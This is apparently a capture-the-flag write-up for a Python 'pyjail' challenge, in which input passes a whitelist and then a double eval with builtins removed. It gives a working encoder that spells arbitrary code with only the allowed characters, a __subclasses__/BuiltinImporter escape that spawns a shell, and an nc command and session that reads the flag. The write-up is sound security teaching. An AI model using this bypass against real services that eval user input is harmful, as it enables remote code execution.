Avatar is a 9-line Python application that was exposed on a network socket:

print("You get one chance to awaken from the ice prison.")
code = input("input: ").strip()
whitelist = """gctf{"*+*(=>:/)*+*"}""" # not the flag
if any([x not in whitelist for x in code]) or len(code) > 40000:
    
    print("Denied!")
    exit(0)

eval(eval(code, {'globals': {}, '__builtins__': {}}, {}), {'globals': {}, '__builtins__': {}}, {})

The application takes a string from the user, checks if that string only contains characters from a whitelist and is not longer than 40,000 characters, and then executes it with eval(eval(input)).

The whitelist is very restrictive, the only allowed characters are the following:

" ( ) * + / : = > c f g t { }

Both eval calls are also very restrictive, since they don’t allow to access any global variables or built-in functions. Notably, this is eval which evaluates just a single expression, not exec which would execute multiple statements.

We assumed that the flag was probably stored on the file system, which meant that we had to find a way to read files.

1st step: Working around the whitelist

We first need to find a way to encode whatever we want to execute with only the allowed characters. The double-eval is helpful here, since we can use the following strategy:

  1. Use the first eval to output what we want to execute, but with only the allowed characters.
  2. Use the second eval to execute that, and find some way to read files next.

For one moment, assume we that the numbers 0-9 were whitelisted. With the {:c} format string specifier, we could then output any character by its ASCII code:

f"{97:c}"
# => 'a'

Assume also, we would have built-in functions like print available. Then we could encode a print statement like this:

eval(eval(f"{112:c}{114:c}{105:c}{110:c}{116:c}({39:c}ctf{39:c})"))
# => "print('ctf')"

Getting numbers without writing numbers

This looks like a promising approach, but unfortunately, numbers are not whitelisted. What is whitelisted however, are the characters *, +, /, =, and >, which might be useful in deriving numbers.

What we can do are comparisons. Consider the following expression that compares if two empty tuples are equal:

()==()
# => True

Similarly, we can get False by testing if one operand is greater than the other:

()>()
# => False

Booleans are not numbers, but True is equal to 1 and False is equal to 0. So, let’s do some arithmetic with these. Here is an example that gets us the number 2:

(()==())+(()==())
# => 2

With a little bit of patience, we can now derive all numbers from 0 to 9. We also make use of the multiplication operator * and exponentiation operator ** to keep the expressions short:

def encode_number_zero_to_ten(number: int):
    if number == 0:
        return """(()>())"""
    if number == 1:
        return """(()==())"""
    if number == 2:
        return """(()==())+(()==())"""  # 1 + 1
    if number == 3:
        return """(()==())+(()==())+(()==())"""  # 1 + 1 + 1
    if number == 4:
        return """(()==())+(()==())+(()==())+(()==())"""  # 1 + 1 + 1 + 1
    if number == 5:
        return """(()==())+(()==())+(()==())+(()==())+(()==())"""  # 1 + 1 + 1 + 1 + 1
    if number == 6:
        return """((()==())+(()==()))*((()==())+(()==())+(()==()))"""  # 2 * 3
    if number == 7:
        return """((()==())+(()==()))*((()==())+(()==())+(()==()))+(()==())"""  # 2 * 3 + 1
    if number == 8:
        return """((()==())+(()==()))**((()==())+(()==())+(()==()))"""  # 2 ** 3
    if number == 9:
        return """((()==())+(()==())+(()==()))**((()==())+(()==()))"""  # 3 ** 2
    if number == 10:
        return """((()==())+(()==())+(()==()))**((()==())+(()==()))+(()==())"""  # 3 ** 2 + 1

We did go even further and wrote a function that is able to encode arbitrary numbers. We do so by finding the closest pair of numbers that, when multiplied or exponentiated, is closest to the target number, and then add the remaining difference (if any) to the result. These are some helper functions to find those closest pairs of numbers:

from math import sqrt


def find_closest_tuple(number: int, op, start: int = 1):
    curr_tuple = (start, start)
    curr_offset = number - op(*curr_tuple)

    stop = int(sqrt(number) + 1)
    for i in range(start, stop):
        for j in range(start, stop):
            offset = number - op(i, j)
            if offset >= 0 and offset < curr_offset:
                curr_offset = offset
                curr_tuple = (i, j)

    assert curr_offset >= 0
    assert number == op(*curr_tuple) + curr_offset
    
    return curr_offset, curr_tuple

def find_closest_mul_tuple(number: int):
    return find_closest_tuple(number, lambda x, y: x * y)


def find_closest_pow_tuple(number: int):
    return find_closest_tuple(number, lambda x, y: x ** y)

Here are some examples to illustrate how this works:

find_closest_mul_tuple(21)
# => 5 + (4 * 4)
find_closest_mul_tuple(42)
# => 6 + (6 * 6)
find_closest_mul_tuple(1337)
# => 41 + (36 * 36)
find_closest_pow_tuple(21)
# => 5 + (2 ** 4)
find_closest_pow_tuple(42)
# => 6 + (6 ** 2)
find_closest_pow_tuple(1337)
# => 6 + (11 ** 3)

Actually encoding a number is then just a matter of calling the above functions. We also try to choose the encoding with the smaller difference, so that the resulting expression is hopefully shorter. In essence, we can encode any number since the following function is recursive:

def encode_number(number: int):
    if number <= 10:
        return encode_number_zero_to_ten(number)
    
    mul_off, (m0, m1) = find_closest_mul_tuple(number)
    pow_off, (p0, p1) = find_closest_pow_tuple(number)

    if mul_off < pow_off:
        txt = "(" + encode_number(m0) + ")*(" +  encode_number(m1) + ")"
        if mul_off > 0:
            txt += "+" + encode_number(mul_off)
    else:
        txt = "(" + encode_number(p0) + ")**(" +  encode_number(p1) + ")"
        if pow_off > 0:
            txt += "+" + encode_number(pow_off)
    
    return txt

Let’s try it out by encoding the number 100 which is the ASCII code for the character d. It’s hard to read, but this is essentially encoding 10**2 then:

encode_number(ord('d'))
# => (((()==())+(()==())+(()==()))**((()==())+(()==()))+(()==()))**((()==())+(()==()))
# => 100

Encoding arbitrary strings

We can easily piece together the above building blocks to encode arbitrary strings now:

def encode_text(text: str):
    result = ""
    for ch in  map(ord, text):
        result += "{" + encode_number(ch) + ":c}"
    return result

Let’s try it out by encoding the expression print('ctf') and wrapping it inside a format string:

encode_text("print('ctf')")
# => f"{(((()==())+(()==())+(()==()))**((()==())+(()==()))+(()==()))**((()==())+(()==()))+((()==())+(()==())+(()==()))**((()==())+(()==()))+(()==())+(()==())+(()==()):c}{(((()==())+(()==())+(()==()))**((()==())+(()==()))+(()==()))**((()==())+(()==()))+((()==())+(()==())+(()==()))**((()==())+(()==()))+(()==())+(()==())+(()==())+(()==())+(()==()):c}{(((()==())+(()==())+(()==()))**((()==())+(()==()))+(()==()))**((()==())+(()==()))+(()==())+(()==())+(()==())+(()==())+(()==()):c}{(((()==())+(()==())+(()==()))**((()==())+(()==()))+(()==()))**((()==())+(()==()))+((()==())+(()==())+(()==()))**((()==())+(()==()))+(()==()):c}{(((()==())+(()==())+(()==()))**((()==())+(()==()))+(()==()))**((()==())+(()==()))+((()==())+(()==()))**((()==())+(()==())+(()==())+(()==())):c}{(((()==())+(()==()))*((()==())+(()==())+(()==())))**((()==())+(()==()))+(()==())+(()==())+(()==())+(()==()):c}{(((()==())+(()==()))*((()==())+(()==())+(()==())))**((()==())+(()==()))+(()==())+(()==())+(()==()):c}{((()==())+(()==())+(()==()))**((()==())+(()==())+(()==())+(()==()))+((()==())+(()==()))**((()==())+(()==())+(()==())+(()==()))+(()==())+(()==()):c}{(((()==())+(()==())+(()==()))**((()==())+(()==()))+(()==()))**((()==())+(()==()))+((()==())+(()==()))**((()==())+(()==())+(()==())+(()==())):c}{(((()==())+(()==())+(()==()))**((()==())+(()==()))+(()==()))**((()==())+(()==()))+(()==())+(()==()):c}{(((()==())+(()==()))*((()==())+(()==())+(()==())))**((()==())+(()==()))+(()==())+(()==())+(()==()):c}{(((()==())+(()==()))*((()==())+(()==())+(()==())))**((()==())+(()==()))+(()==())+(()==())+(()==())+(()==())+(()==()):c}"
# => "print('ctf')"

Wonderful, we can now encode whatever code we want to execute with just the allowed characters.

2nd step: Getting a shell without built-in functions

To browse the target system for the flag, we attempted to directly get a shell. However, we can’t easily execute __import__("os").system("sh") because we have no built-in functions or global variables available. Luckily, there are plenty of ways to get to the built-in functions nonetheless.

After a bit of trial and error, we found the following expression to work well:

[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'BuiltinImporter'][0]().load_module('os').system('sh')

This is doing the following:

  1. Access the class of the tuple (1) with (1).__class__ and traverse its inheritance tree
  2. Find the class BuiltinImporter anywhere in that inheritance tree
  3. Create an instance of that class with ()
  4. Load the module os with .load_module('os')
  5. Execute the command sh with .system('sh')

We can encode this expression with the above encode_text function to get the payload.txt (16,764 characters):

payload = "[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'BuiltinImporter'][0]().load_module('os').system('sh')"
payload = 'f"{}"'.format(encode_text(payload))
with open("payload.txt", "w") as f:
    f.write(payload)

One can easily forward that payload to the server and keep the connection open. Don’t forget to press ENTER once to actually send the input.

 { cat payload.txt; cat; } | nc chall.glacierctf.com 13384
You get one chance to awaken from the ice prison.
input:
ls
chall.py
flag.txt
cat flag.txt
gctf{But_wh3n_th3_w0rld_n33d3d_h1m_m0st_h3_sp4wn3d_4_sh3ll}

The flag is gctf{But_wh3n_th3_w0rld_n33d3d_h1m_m0st_h3_sp4wn3d_4_sh3ll} 🥳